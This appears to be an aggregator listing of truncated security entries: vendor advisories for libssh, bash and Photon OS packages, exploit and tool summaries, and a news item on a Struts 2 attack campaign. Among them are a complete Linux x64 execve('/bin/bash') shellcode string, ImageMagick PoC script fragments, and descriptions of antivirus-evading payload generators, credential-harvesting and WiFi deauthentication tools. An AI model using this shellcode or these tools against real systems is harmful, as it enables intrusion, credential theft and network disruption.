ImageMagick - Memory Leak Exploit
Exploit for multiple platform in category local exploits !/bin/bash help echo "Usage poc generator: basename $0 gen WIDTHxHEIGHT NAME.xbm minimal" echo " Example gen: basename $0 gen 512x512 poc.xbm" echo "Usage result recovery: basename $0 recover SAVEDPREVIEW.png|jpeg|gif|etc" echo " Example...
ImageMagick - Memory Leak
ImageMagick - Memory Leak !/bin/bash help echo "Usage poc generator: basename $0 gen WIDTHxHEIGHT NAME.xbm minimal" echo " Example gen: basename $0 gen 512x512 poc.xbm" echo "Usage result recovery: basename $0 recover SAVEDPREVIEW.png|jpeg|gif|etc" echo " Example recovery: basename $0 recover...
ImageMagick - Memory Leak
!/bin/bash help echo "Usage poc generator: basename $0 gen WIDTHxHEIGHT NAME.xbm minimal" echo " Example gen: basename $0 gen 512x512 poc.xbm" echo "Usage result recovery: basename $0 recover SAVEDPREVIEW.png|jpeg|gif|etc" echo " Example recovery: basename $0 recover avatar.png" if "$1" == "-h" ;...
Armor - Tool Designed To Create Encrypted macOS Payloads Capable Of Evading Antivirus Scanners
Armor is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners. Below is an example gif of Armor being used with a simple Netcat payload. A Netcat listener is started on port 4444. The "payload.txt" file is read and shown to contain a simple Bash...
SUSE SLED12 Security Update : libssh (SUSE-SU-2018:3253-1)
This update for libssh fixes the following issues : Security issue fixed : CVE-2018-10933: Fixed a server mode authentication bypass bsc1108020. Non security issue fixed: Fix popd syntax to be compatible with newer versions of the bash shell. Note that Tenable Network Security has extracted the...
SUSE SLES12 Security Update : bash (SUSE-SU-2018:1398-2)
This update for bash fixes the following issues : Security issues fixed : CVE-2016-7543: A code execution possibility via SHELLOPTS+PS4 variable was fixed bsc1001299 CVE-2016-0634: Arbitrary code execution via malicious hostname was fixed bsc1000396 Non-security issues fixed: Fix repeating...
SUSE-SU-2018:3253-1 Security update for libssh
This update for libssh fixes the following issues: Security issue fixed: - CVE-2018-10933: Fixed a server mode authentication bypass bsc1108020. Non security issue fixed: - Fix popd syntax to be compatible with newer versions of the bash shell...
SUSE-SU-2018:1398-2 Security update for bash
This update for bash fixes the following issues: Security issues fixed: - CVE-2016-7543: A code execution possibility via SHELLOPTS+PS4 variable was fixed bsc1001299 - CVE-2016-0634: Arbitrary code execution via malicious hostname was fixed bsc1000396 Non-security issues fixed: - Fix repeating...
Swap Digger - Tool That Automates Swap Extraction And Searches For Linux User Credentials, Web Forms Credentials, Web Forms Emails, Http Basic Authentication, Wifi SSID And Keys, Etc
swapdigger is a bash script used to automate Linux swap analysis for post-exploitation or forensics purpose. It automates swap extraction and searches for Linux user credentials, Web form credentials, Web form emails, HTTP basic authentication, WiFi SSID and keys, etc. Download and run the tool O...
Qutebrowser CSRF Vulnerability
qutebrowser before version 1.4.1 is vulnerable to a cross-site request forgery flaw that allows websites to access qute:// URLs. A malicious website could exploit this to load a qute://settings/set URL, which then sets editor.command to a bash script, resulting in arbitrary code execution...
Linux/x64 - execve ("/bin/bash") Shellcode (27 bytes)
Author: Artr0n Linux/x64 - Execve/bin/bash Shellcode Shellcode Lenght: 27 include include int mainvoid char shellcode = "\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"; printf"size: %d\n", strlenshellcode; void shellcode; return 0;...
openSUSE Security Update : libzypp / zypper (openSUSE-2018-1054)
This update for libzypp, zypper fixes the following issues : Update libzypp to version 16.17.20 : Security issues fixed : - PackageProvider: Validate delta rpms before caching bsc1091624, bsc1088705, CVE-2018-7685 - PackageProvider: Validate downloaded rpm package signatures before caching...
Network-Attacker - WiFi Stress Testing Beacon Flooding & Deauthentication Attack
network-attacker V0.1 is a Wifi Stress Testing Bash Script Program Based on Mdk3 Beacon Flooding & Deauthentication Attack Created To Help Beginners And even Professionals For a Beacon Flooding Or Deauthentication Attack On Networks Installation sudo apt-get install git sudo git clone...
Staubli Jacquard Industrial System JC6 Shellshock Vulnerability
Staubli Jacquard Industrial System JC6 suffers from a bash environment variable handling code injection vulnerability. Exploit Title: Staubli Jacquard Industrial System | GNU Bash Environment Variable Handling Code Injection Shellshock Exploit Author: t4rkd3vilz Vendor Homepage:...
Wildpwn - Unix Wildcard Attack Tool
Wildpwn is a Python UNIX wildcard attack tool that helps you generate attacks, based on a paper by Leon Juranic. It’s considered a fairly old-skool attack vector, but it still works quite often. First things first! Read: https://www.exploit-db.com/papers/33930/ Basic usage It goes something like...
Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild
It was only a matter of time before attacks were seen in the wild, and now it’s happened. A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. It uses a new malware designed for persistence and...
ASWCrypter - An Bash&Python Script For Generating Payloads that Bypasses All Antivirus
A Bash & Python script for generating payloads that bypass all antivirus so far (FUD). PLEASE DON'T UPLOAD BACKDOOR TO WWW.VIRUSTOTAL.COM Important: This version is just for test. In future I will update ASWCrypter to generate payloads for Linux, Mac and Windows. Legal Disclaimer: The author does...
Photon OS 1.0: Bash / Curl / Mariadb / Openvswitch / Systemd PHSA-2017-0044 (deprecated)
An update of openvswitch,systemd,curl,mariadb,bash packages for PhotonOS has been released. (C) Tenable Network Security, Inc. @DEPRECATED@ Disabled on 2/7/2019 The descriptive text and package checks in this plugin were extracted from VMware Security Advisory PHSA-2017-0044. The text itself is...
Photon OS 2.0: Bash / Curl / Go / Libtiff / Systemd PHSA-2017-0045 (deprecated)
An update of go,curl,libtiff,systemd,bash packages for PhotonOS has been released. (C) Tenable Network Security, Inc. @DEPRECATED@ Disabled on 2/7/2019 The descriptive text and package checks in this plugin were extracted from VMware Security Advisory PHSA-2017-0045. The text itself is copyright C...
Photon OS 1.0: Bash / Glibc / Libgcrypt / Libtar / Openjdk / Openjre / Strongswan / Unzip PHSA-2017-0040 (deprecated)
An update of openjdk,openjre,bash,libtar,glibc,libgcrypt,strongswan,unzip packages for PhotonOS has been released. (C) Tenable Network Security, Inc. @DEPRECATED@ Disabled on 2/7/2019 The descriptive text and package checks in this plugin were extracted from VMware Security Advisory PHSA-2017-0040...